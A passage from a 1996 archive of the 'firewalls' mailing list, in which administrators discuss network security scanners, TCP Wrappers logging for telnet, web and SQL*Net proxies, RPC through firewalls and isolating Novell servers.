Wrappers ! Mohammed Ali. From firewalls-owner Tue Feb 6 06:58:08 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA15224 for firewalls-outgoing; Tue, 6 Feb 1996 06:45:46 -0800 (PST) Received: from iss.net (iss.iss.net [204.241.60.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA15218 for ; Tue, 6 Feb 1996 06:45:42 -0800 (PST) Received: (from cklaus@localhost) by iss.net (8.6.4/8.6.4) id KAA25413 for firewalls@greatcircle.com; Tue, 6 Feb 1996 10:07:39 -0500 From: Christopher Klaus Message-Id: <199602061507.KAA25413@iss.net> Subject: PC Week Article on Network Security Scanners To: firewalls@greatcircle.com Date: Tue, 6 Feb 1996 10:07:38 +1494730 (EST) X-Mailer: ELM [version 2.4 PL20] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Daemons Defy Hackers -------------------- PC Week (Feb 5) has an article comparing all the network security scanners: Internet Scanner 3.2, PingWare 2.01, SATAN, and NetProbe. It does a really good job pointing out the strengths and weaknesses of these products. The online article is at: http://www.zdnet.com/~pcweek/netweek/0205/tdaem.html or http://www.zdnet.com/~pcweek/netweek/netweek.html ISS 1.x and Internet Scanner 3.2 Comparision -------------------------------------------- With CERT recommending and many people using the shareware version of Internet Security Scannner 1.x (ISS), we have put a whitepaper on comparing between the commercial and shareware versions. The whitepaper is available at: ftp://ftp.iss.net/pub/iss/issvis.doc ISS Receives Funding -------------------- Internet Security Systems, Inc. has received venture funding from Greylock Management Company and Sigma Partners. Both of these firms have funded early stage Internet technology companies and bring tremendous value to ISS at this stage of our growth. This funding provides ISS with the necessary capital to deliver innovative new security products to the Internet marketplace. We have many available engineering positions in our labs for the development of our new products. If you have extensive experience in UNIX and NT system level programming, please contact us at jobs@iss.net -- Christopher William Klaus Voice: (404)252-7270. Fax: (404)252-2427 Internet Security Systems, Inc. "Internet Scanner finds Ste. 115, 5871 Glenridge Dr, Atlanta, GA 30328 your network security holes Web: http://iss.net/ Email: cklaus@iss.net before the hackers do." From firewalls-owner Tue Feb 6 07:24:07 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA15044 for firewalls-outgoing; Tue, 6 Feb 1996 06:41:43 -0800 (PST) Received: from relay2.UU.NET (relay2.UU.NET [192.48.96.7]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA15023 for ; Tue, 6 Feb 1996 06:41:29 -0800 (PST) Received: from kuma.ciens.ucv.ve by relay2.UU.NET with SMTP id QQabti14509; Tue, 6 Feb 1996 09:37:46 -0500 (EST) Received: by kuma.ciens.ucv.ve (1.37.109.4/16.2) id AA06450; Tue, 6 Feb 96 09:37:24 -0430 Date: Tue, 6 Feb 1996 09:37:24 -0430 (SAT) From: Carolina Elortegui To: Firewalls Mailing List Subject: Some Information Message-Id: Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, I just want someone to tell me where can I find information about what every service you can allow or deny in inetd.sec means. I tried the "man" command, but it doesn't help. I tried the manual, but it neither helps. Please, would you send me some addresses where I can find information. Thanks. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Carolina Elortegui Laboratorio de Postgrado Universidad Central de Venezuela Administrador Facultad de Ciencias Escuela de Computacion E-mail: celort@kuma.ciens.ucv.ve ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From firewalls-owner Tue Feb 6 07:58:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA18823 for firewalls-outgoing; Tue, 6 Feb 1996 07:43:00 -0800 (PST) Received: from Fe3.rust.net (Fe3.rust.net [204.157.12.254]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id HAA18816 for ; Tue, 6 Feb 1996 07:42:54 -0800 (PST) Received: from dtw-2.rust.net (dtw-2.rust.net [205.199.83.102]) by Fe3.rust.net (8.7.3/8.7.3) with SMTP id KAA18136; Tue, 6 Feb 1996 10:40:05 -0500 (EDT) Date: Tue, 6 Feb 1996 10:40:05 -0500 (EDT) Message-Id: <199602061540.KAA18136@Fe3.rust.net> X-Sender: janken@rust.net X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: "KM" From: "Kenneth J. Stephens" Subject: Re: Survey Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 03:58 PM 2/5/96 -0500, you wrote: SNIP OTHER STUFF------------- >INFOSECURITY NEWS ran its "Shopping for Firewalls" survey in 1995. >Unfortunately, my copy is a reprint, which has no specific issue date on it. >(Magazines that print and distribute these reprints should take heed; it would >be extremely helpful if you'd include the date of the issue in which they were >printed!) If anyone can help, please do. If the magazine publishers forced the issue date onto all of their reprints the vendors would have little use for the reprints. The date stamp would obsolete the reprint so quickly that the vendor would look foolish for distributing old info. One of the hazards of a dynamic industry. Ken > >Karen Goertzel >Manager, International Programmes and Special Projects >Secure Systems and Services Operation >Wang Federal, Inc. >7900 Westpark Drive - MS 700 >McLean, Virginia 22102-4299 >TEL: 703-827 3914 >FAX: 703-827 3161 >goertzek@wangfed.com >http://www.wangfed.com > [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] [] [] [] Ken Stephens Senior Capacity Planner/Data Security Officer [] [] email: Ken_Stephens@miconsulting.com Voice (313) 876-5081 [] [] Michigan Employment Security Commission (MESC) Fax (313) 876-6827 [] [] 7th Fl. I.S. [] [] 7310 Woodward Ave [] [] Detroit, MI 48202 [] [] [] [] Millennium Consulting Your Security Policy is only [] [] 28234 Diesing Dr. as strong as your organization's [] [] Madison Heights, MI 48071 commitment to it. [] [] [] [][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][][] From firewalls-owner Tue Feb 6 08:08:33 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19284 for firewalls-outgoing; Tue, 6 Feb 1996 07:53:02 -0800 (PST) Received: from mail.pi.se (mail.pi.se [194.52.20.8]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19268 for ; Tue, 6 Feb 1996 07:52:56 -0800 (PST) Received: from z (docutech.telegate.se [194.142.26.28]) by mail.pi.se (8.6.10/8.6.9) with SMTP id QAA17949; Tue, 6 Feb 1996 16:50:56 +0100 Message-Id: <199602061550.QAA17949@mail.pi.se> X-Sender: s2833@mail.pi.se X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Tue, 06 Feb 1996 16:49:18 -10000 To: Sick Puppy , firewalls@GreatCircle.COM From: Matts Kallioniemi Subject: Re: Need a few pointers Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 17.41 1996-02-05 -0500, Sick Puppy wrote: >There was a very good response to my query. I had no idea there were >so many security problems and performance problems associated with >WindBlows 95. Sounds like the operating system was written by a couple >of drunken cats. In a couple of days I will get the responses together >in one file, together with a couple of good web pointers, and pass it on >to anyone who wants an e-mailed copy. I want one, please! Why don't you post it to the list? matts From firewalls-owner Tue Feb 6 08:23:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19221 for firewalls-outgoing; Tue, 6 Feb 1996 07:49:53 -0800 (PST) Received: from sonyinet.sony.co.jp (sonyinet.sony.co.jp [202.238.80.17]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19211 for ; Tue, 6 Feb 1996 07:49:47 -0800 (PST) Received: from sonygw.sony.co.jp ([43.0.1.249]) by sonyinet.sony.co.jp (8.6.10/3.3Wb-96011708) with SMTP id AAA09561 for ; Wed, 7 Feb 1996 00:48:56 +0900 Received: from sabakon.adv.sbc.sony.co.jp ([43.194.41.150]) by sonygw.sony.co.jp (4.0/6.4J.6) id AA06508; Wed, 7 Feb 96 00:48:36 JST Received: from barolo.adv.sbc.sony.co.jp by sabakon.adv.sbc.sony.co.jp (4.1/6.4J.6-sbc) id AA05482; Tue, 6 Feb 96 15:48:35 GMT From: md@adv.sbc.sony.co.jp (Mark Dudley) Date: Tue, 6 Feb 96 15:46:38 GMT Received: from rioja.adv.sbc.sony.co.jp by barolo.adv.sbc.sony.co.jp (4.0/6.4J.6-sbc) id AA17730; Tue, 6 Feb 96 15:46:38 GMT Message-Id: <9602061546.AA17730@barolo.adv.sbc.sony.co.jp> To: firewalls@greatcircle.com Subject: planet gateway firewall Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I want to set up a connection to the Internet via an ISDN line and use a firewall. Planet Gateway offer a package to do this including their own firewall. Has any one had any experiance of their firewall product? If so any comments ? Mark Dudley From firewalls-owner Tue Feb 6 08:38:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id IAA20924 for firewalls-outgoing; Tue, 6 Feb 1996 08:32:11 -0800 (PST) Received: from bayflash.stpt.usf.edu (bayflash.stpt.usf.edu [131.247.140.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id IAA20912 for ; Tue, 6 Feb 1996 08:32:02 -0800 (PST) Received: (johnson@localhost) by bayflash.stpt.usf.edu (8.6.11/8.6.5) id LAA13256; Tue, 6 Feb 1996 11:27:42 -0500 Date: Tue, 6 Feb 1996 11:27:41 -0500 (EST) From: Steven Johnson - Hukd on Fonix X-Sender: johnson@bayflash To: Prakash N Purushotham cc: "'firewalls@greatcircle.com'" Subject: Re: telnetd In-Reply-To: <31180839@gangotri.mindware.soft.net> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 6 Feb 1996, Prakash N Purushotham wrote: > Is there any way I can configure telnetd to log the client's > IP Address, the login id used, time stamps in syslog? Use TCP Wrappers, you can configure which protocols you want added to an event log. We currently monitor telnet, finger, ftp, and rsh, to name a few. ____ ___ ________ ________ /_ _) /_ ) / ______)/ ______)_/| / _/ / / / (____ / /___ _/ | Email: johnson@stpt.usf.edu / _/ / / \____ ) / _____) _/ | / _/___/ / ______/ / / / _/ | WWW: http://www.stpt.usf.edu/~johnson (_________)(________)(___)______/ | From firewalls-owner Tue Feb 6 09:03:43 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id HAA19588 for firewalls-outgoing; Tue, 6 Feb 1996 07:59:51 -0800 (PST) Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id HAA19581 for ; Tue, 6 Feb 1996 07:59:44 -0800 (PST) Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 10:59:09 EST Received: from relay3.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 13:51:09 EST Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQaaql23355; Mon, 29 Jan 1996 13:47:31 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA07596 for firewalls-outgoing; Mon, 29 Jan 1996 09:53:17 -0800 (PST) Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA07591 for ; Mon, 29 Jan 1996 09:53:13 -0800 (PST) Received: from waller.bwh.harvard.edu (waller.bwh.harvard.edu [134.174.81.249]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id MAA09560; Mon, 29 Jan 1996 12:52:09 -0500 From: Adam Shostack Received: by waller.bwh.harvard.edu (8.6.9) id MAA02600; Mon, 29 Jan 1996 12:51:49 -0500 Message-ID: <199601291751.MAA02600@waller.bwh.harvard.edu> Subject: Re: router performance To: bwalker@musings.com (Brad Walker) Date: Mon, 29 Jan 1996 12:51:49 -0500 (EST) CC: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You wrote: | I believe at one time there was some work being done at Harvard Univ. | about testing router performance. | | Can someone please point me to this or another site that is doing | router performance testing.. Harvard has a network device test lab, ftp or http ndtl.harvard.edu/ndtl Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Tue Feb 6 09:08:50 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA21950 for firewalls-outgoing; Tue, 6 Feb 1996 09:04:37 -0800 (PST) Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA21944 for ; Tue, 6 Feb 1996 09:04:28 -0800 (PST) Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 12:03:25 EST Received: from relay3.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 13:51:09 EST Received: from miles.greatcircle.com by relay3.UU.NET with ESMTP id QQaaql23355; Mon, 29 Jan 1996 13:47:31 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA07596 for firewalls-outgoing; Mon, 29 Jan 1996 09:53:17 -0800 (PST) Received: from bwh.harvard.edu (bwh.harvard.edu [134.174.81.34]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA07591 for ; Mon, 29 Jan 1996 09:53:13 -0800 (PST) Received: from waller.bwh.harvard.edu (waller.bwh.harvard.edu [134.174.81.249]) by bwh.harvard.edu (8.6.9/8.6.9) with ESMTP id MAA09560; Mon, 29 Jan 1996 12:52:09 -0500 From: Adam Shostack Received: by waller.bwh.harvard.edu (8.6.9) id MAA02600; Mon, 29 Jan 1996 12:51:49 -0500 Message-ID: <199601291751.MAA02600@waller.bwh.harvard.edu> Subject: Re: router performance To: bwalker@musings.com (Brad Walker) Date: Mon, 29 Jan 1996 12:51:49 -0500 (EST) CC: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk You wrote: | I believe at one time there was some work being done at Harvard Univ. | about testing router performance. | | Can someone please point me to this or another site that is doing | router performance testing.. Harvard has a network device test lab, ftp or http ndtl.harvard.edu/ndtl Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Tue Feb 6 09:53:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA23487 for firewalls-outgoing; Tue, 6 Feb 1996 09:41:30 -0800 (PST) Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id JAA23470; Tue, 6 Feb 1996 09:41:17 -0800 (PST) Message-Id: <199602061741.JAA23470@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA042058427; Tue, 6 Feb 1996 12:40:27 -0500 Date: Tue, 6 Feb 1996 12:40:27 -0500 From: gary flynn To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM Subject: Re: SQL*Net proxy? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Has anyone successfully configured a proxy for outbound/inbound SQL*Net > transactions? > > In my observations, Unix to Unix server communications take place on a > designated port, but PC to Unix communications switch port numbers after > about 20-25 packets. > > The PC always sends to the designated port, but the Unix server changes > to a different port. This makes filtering difficult. > Oracle servers that are configured as mulithreaded wil use dynamic ports. Several firewall vendors are working with Oracle to develop a SQLnet proxy. I don't know the timeframe. From firewalls-owner Tue Feb 6 10:12:54 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24566 for firewalls-outgoing; Tue, 6 Feb 1996 10:04:23 -0800 (PST) Received: from pcslink.com (pcslink.com [206.43.160.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24560 for ; Tue, 6 Feb 1996 10:04:19 -0800 (PST) Received: from ryan (ryan.pcslink.com [206.43.161.41]) by pcslink.com (8.6.12/8.6.12) with SMTP id LAA15513 for ; Tue, 6 Feb 1996 11:03:27 -0700 Message-ID: <31179737.5344@pcslink.com> Date: Tue, 06 Feb 1996 11:00:23 -0700 From: Ryan Mooney X-Mailer: Mozilla 2.0b6a (WinNT; I) MIME-Version: 1.0 To: firewalls@GreatCircle.COM Subject: Re: WWW Proxy Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > to add one more, for the firewalls 'inside' address> Does such a proxy > > exist for WWW so that: > > 1. Users can use which-ever browers they like. > > 2. The 'standard' winsock.dll, such as provided by FTP with their > > Onnet product, can still be used. > > CERN's httpd > and run it in caching-proxy mode. I set it up to listen to a port, and > simply point all http, ftp, and gopher requests at that port. Note that > > If so, which comercial firewalls support this? > I have this in place with TIS' fwtk. I simply don't use the http-gw that > came with the fwtk, and use CERN's instead. I used CERN for a company I worked for quite a while ago but have heard that Harvest Cache is a LOT faster (and the CERN daemon is quite slow). I socksified the CERN daemon (I imagine it could fairly easily be done for the Harvest daemon also) so that I wouldn't have this huge process running on my firewall (which is generally IMNSHO a bad idea - this is the same reason we don't run sendmail on firewall machines without a wrapper). Simple Diagram (I love diagrams) client----Socksified Cern/Harvest-----Application layer firewall(socks)----world Just my $0.000002 From firewalls-owner Tue Feb 6 10:24:00 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24896 for firewalls-outgoing; Tue, 6 Feb 1996 10:13:23 -0800 (PST) Received: from newsgw.mentorg.com (newsgw.mentorg.com [137.202.128.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24864 for ; Tue, 6 Feb 1996 10:13:06 -0800 (PST) Received: from emperor.sje.MENTORG.COM by newsgw.mentorg.com (8.6.4/CF5.22R) id KAA02869; Tue, 6 Feb 1996 10:10:31 -0800 Received: from sjsys5 by emperor.sje.MENTORG.COM (8.6.8.1/CF5.24R) id KAA12762; Tue, 6 Feb 1996 10:10:40 -0800 From: joe_woolf@MENTORG.COM (Joe Woolf) Received: by sjsys5 (4.1/CF5.24L) id AA21330; Tue, 6 Feb 96 10:13:29 PST Date: Tue, 6 Feb 96 10:13:29 PST Message-Id: <9602061813.AA21330@sjsys5> To: prakashp@mindware.soft.net, ali@protosoft.com Subject: Re: telnetd Cc: firewalls@greatcircle.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Mohammed, Yes. That seems to be the easiest solution. Joe Woolf Network Support Mentor Graphics, San Jose Phone: 451-5844 ** From firewalls-owner@GreatCircle.COM Tue Feb 6 08:05:47 1996 ** Date: Tue, 6 Feb 1996 08:36:17 -0600 (CST) ** From: Mohammed Ali ** To: Prakash N Purushotham ** Cc: "'firewalls@greatcircle.com'" ** Subject: Re: telnetd ** Mime-Version: 1.0 ** Content-Type** : ** TEXT/PLAIN** ; ** charset=US-ASCII** ** Sender: firewalls-owner@GreatCircle.COM ** Precedence: bulk ** ** On Tue, 6 Feb 1996, Prakash N Purushotham wrote: ** ** > ** > Is there any way I can configure telnetd to log the client's ** > IP Address, the login id used, time stamps in syslog? ** > ** ** How about using TCP Wrappers ! ** ** Mohammed Ali. ** From firewalls-owner Tue Feb 6 10:38:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA24830 for firewalls-outgoing; Tue, 6 Feb 1996 10:12:40 -0800 (PST) Received: from pcslink.com (pcslink.com [206.43.160.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA24825 for ; Tue, 6 Feb 1996 10:12:37 -0800 (PST) Received: from ryan (ryan.pcslink.com [206.43.161.41]) by pcslink.com (8.6.12/8.6.12) with SMTP id LAA15564 for ; Tue, 6 Feb 1996 11:11:47 -0700 Message-ID: <3117992D.3D89@pcslink.com> Date: Tue, 06 Feb 1996 11:08:45 -0700 From: Ryan Mooney X-Mailer: Mozilla 2.0b6a (WinNT; I) MIME-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: Novell inside IP Port? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk According to the novell docks that I have read Netware IP IP relay and IP tunnel all run on 213/udp (Yuck - udp) Basically I would filter anything from/to that port. Also you could put all the novell machines on thier own subnet with a router (Oh say something like karlbridge) inbetween and JUST allow IPX across that wall. That is a lot better IMNSHO than just filtering what novell tells you they use (OK so I don't believe everything I read ;) If security is a real issue I would also have a policy that denies inbound anything except to preaproved machines that have well known and well controlled services. Of course thats just firewalls 101 and you probabley knew that already.... > Is there known TCP/UDP port(s) that support the > tunneling of Novell insided IP? Someone recently set up > such a tunnel and exposed all our Novell Servers to the > Internet. I would like to prevent this from happening > in the future. From firewalls-owner Tue Feb 6 11:00:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id JAA24132 for firewalls-outgoing; Tue, 6 Feb 1996 09:56:26 -0800 (PST) Received: from uu9.psi.com (uu9.psi.com [38.145.107.9]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id JAA24127 for ; Tue, 6 Feb 1996 09:56:21 -0800 (PST) Received: from infosys.inf.COM by uu9.psi.com (5.65b/4.0.071791-PSI/PSINet) via SMTP; id AA08985 for firewalls@GreatCircle.COM; Tue, 6 Feb 96 12:55:10 -0500 Received: by Inf.COM (4.1/SMI-4.1) id AA06155; Tue, 6 Feb 96 12:52:22 EST Received: from unknown(204.4.59.106) by infosys.inf.COM via smap (V1.3) id sma006142; Tue Feb 6 12:52:17 1996 Received: from cc:Mail by smtp_gw.inf.com id AA823601570; t Fz B1@  Vx Fvi 06 Feb 95 10:34:29 EST Date: t Fz B1@  Vx Fvi 06 Feb 95 10:34:29 EST From: "SATEESHB" Message-Id: <9601068236.AA823601570@smtp_gw.inf.com> To: firewalls@GreatCircle.COM, "Richard Giering Jr." Subject: Re: RPC Across a firewall? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk 1.RPC runs on TCP also. 3. Why RPC is insecure?. Any discussion on this topic would be of help to us. sateesh. ______________________________ Reply Separator _________________________________ Subject: RPC Across a firewall? Author: "Richard Giering Jr." at SMTP_GW Date: 2/5/96 5:58 PM I know the kind of reaction I'm libel to get but I said I'd check into it.... We have developers who are writing apps based upon RPC and demanding that RPC be opened on the firewall. The idea is to enable users with their own Internet provider to be able to access Internal applications using RPC/client-server apps. I have some concerns listed below. Can anyone think of anymore? 1) RPC runs on UDP (right?) and UDP opens a whole other bag of worms 2) RPC and portmapper are hard if not impossible to proxy. 3) RPC is insecure 4) portmapper has many known security holes. My reaction has been "if they want to dialup, we'll setup internal modems" Is anyone aware of firewall products allow and protect RPC? Rick Giering, Firewall Ranger CCH Inc. From firewalls-owner Tue Feb 6 11:09:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA25921 for firewalls-outgoing; Tue, 6 Feb 1996 10:35:00 -0800 (PST) Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA25916 for ; Tue, 6 Feb 1996 10:34:54 -0800 (PST) Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 13:34:14 EST Received: from relay4.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 19:50:41 EST Received: from miles.greatcircle.com by relay4.UU.NET with ESMTP id QQaarj24144; Mon, 29 Jan 1996 19:46:18 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id NAA23905 for firewalls-outgoing; Mon, 29 Jan 1996 13:48:36 -0800 (PST) Received: from mercury.Sun.COM (mercury.Sun.COM [192.9.25.1]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id NAA23900 for ; Mon, 29 Jan 1996 13:48:32 -0800 (PST) Received: from East.Sun.COM by mercury.Sun.COM (Sun.COM) id NAA02134; Mon, 29 Jan 1996 13:47:28 -0800 Received: from congress.East.Sun.COM by East.Sun.COM (5.x/SMI-5.3) id AA18018; Mon, 29 Jan 1996 16:47:21 -0500 Received: from traveller.East.Sun.COM by congress.East.Sun.COM (4.1/SMI-4.1) id AA29802; Mon, 29 Jan 96 16:47:09 EST Received: by traveller.East.Sun.COM (SMI-8.6/SMI-SVR4) id QAA06214; Mon, 29 Jan 1996 16:47:11 -0500 Date: Mon, 29 Jan 1996 16:47:11 -0500 From: giff@congress.East.Sun.COM (Wayne Gifford - Internet Commerce Group) Message-ID: <199601292147.QAA06214@traveller.East.Sun.COM> To: Firewalls@GreatCircle.COM Subject: Most Secure Unix? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk There are no secure UNIXes, only security concious administrators giff Wayne Gifford - Dr. SunScreen giff@east.sun.com Sun Internet Commerce Group Phone 703-716-6426 2100 Reston Parkway Phax 703-620-1244 Reston VA, 22091 From firewalls-owner Tue Feb 6 11:27:09 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id KAA25942 for firewalls-outgoing; Tue, 6 Feb 1996 10:35:23 -0800 (PST) Received: from indigo.atlanta.com (indigo.atlanta.net [155.229.2.201]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id KAA25934 for ; Tue, 6 Feb 1996 10:35:15 -0800 (PST) Received: by atlanta.net (MX V4.2 VAX) with SITE; Tue, 06 Feb 1996 13:34:18 EST Received: from relay7.UU.NET by indigo.atlanta.com (MX V4.2 VAX) with SMTP; Mon, 29 Jan 1996 19:58:51 EST Received: from miles.greatcircle.com by relay7.UU.NET with ESMTP id QQaarj22334; Mon, 29 Jan 1996 19:50:29 -0500 (EST) Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id PAA00677 for firewalls-outgoing; Mon, 29 Jan 1996 15:50:24 -0800 (PST) Received: from relay5.UU.NET (relay5.UU.NET [192.48.96.15]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id PAA00672 for ; Mon, 29 Jan 1996 15:50:21 -0800 (PST) Received: from maestro.Maestro.COM by relay5.UU.NET with SMTP id QQaarf06863; Mon, 29 Jan 1996 18:49:14 -0500 (EST) Received: by maestro.Maestro.COM (4.1/MAESTRO-0.1/07-03-93) id AA02510; Mon, 29 Jan 96 18:38:49 EST Date: Mon, 29 Jan 1996 18:38:48 -0500 (EST) From: Sick Puppy To: firewalls@GreatCircle.com Subject: Re: Desktop tools needed Message-ID: Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Ah would like to say Thank You to all those great d00ds who provided pointers to kewl tewlz and also those folks who pointed out there are legitimate utilities. Ah get so carried away with sniffing and cracking that Ah often forgit there is legal ways to do things. Hence-forth, by popular vote, Professor Patch, Dalmation Nation shall be known as Hack Dawgie Dawg. Thanks also to those whose grey matter provided original names, especially Mark. Sick Puppy, the Cat_Eating_Dawg the Church of the Dead Meow From firewalls-owner Tue Feb 6 11:38:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id LAA27234 for firewalls-outgoing; Tue, 6 Feb 1996 11:06:42 -0800 (PST) Received: from esl-hub.demon.co.uk (esl-hub.demon.co.uk [158.152.8.209]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id LAA27072 for ; Tue, 6 Feb 1996 11:03:26 -0800 (PST) Path: esl.tex.com!dbuckley From: dbuckley@esl.tex.com (David Buckley) Subject: Re: Internet-access from Novell References: <14223c_20@gaitor.tex.com> To: firewalls@greatcircle.com Message-ID: <823657988snx@esl.tex.com> X-Mailer: cppnews $Revision: 1.41 $ Date: Tue, 06 Feb 96 18:53:08 GMT Organization: Electric Solutions Ltd Lines: 96 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In article <14223c_20@gaitor.tex.com> you write: > Here's the worse problem I mentioned. > > I've grepped over 9000 archived articles of this group > and found no mention of how to firewall novell boxes from > each other. I have a client in the financial industry who > has a market data feed from a provider. The market data feed > is provided by a novell server on a leased line, with special > client software for the users. How do I protect said client > from, say, a disgruntled mailroom employee at the provider end, > bent on hacking on the clients network? Whoa! Lets slow down here. Firstly, you're in the wrong area. You need novell experts, not networking experts, 'cos (and I'm a network professional slinging bricks from within my glass house here) most networking folk consider themselves 'above' IPX, and don't like the thought of that horrible stuff polluting their nice IP networks. Nextly, Novell is in general orders of magnitude safer than the IP world. Don't Panic! There are two sorts of 'accesses' floks commonly talk about in reference to Novell, netWare, or IPX/SPX: 1: NCP - this is the 'normal' mode of operation of a client workstation logging into a fileserver, for file and print services. This uses IPX as it's underlying transport. 2: IPX not involving NCP or SPX - these are essentially a peer to peer service, which only involves a fileserver if the fileserver happens to be one of the peers involved. An example of this would be NetWare for SAA, which is a IBM 3270 gateway that happens to run on a fileserver platform, as opposed to being stand alone on a non-fileserver box. Firstly, NCP: Clients access servers, not the other way round, so access to a server can't compromise a client workstation's files directly. This means the worst your disgruntled mailroom employee can do is destroy the feeding fileserver. Obviously, he could alter a .BAT or .EXE to wreak havoc on a client, but as this .EXE or .BAT has legitimately been access by the client, it's impossible(ish) to guard against by normall firewall tricks. > I'm not even sure what novell uses in lieu of tcp/udp ports; > pointers to IPX/SPX docs, and the Novell equivalent of > an /etc/services file would be most appreciated. IPX is roughly equal to UDP SPX is roughly equal to TCP There is no 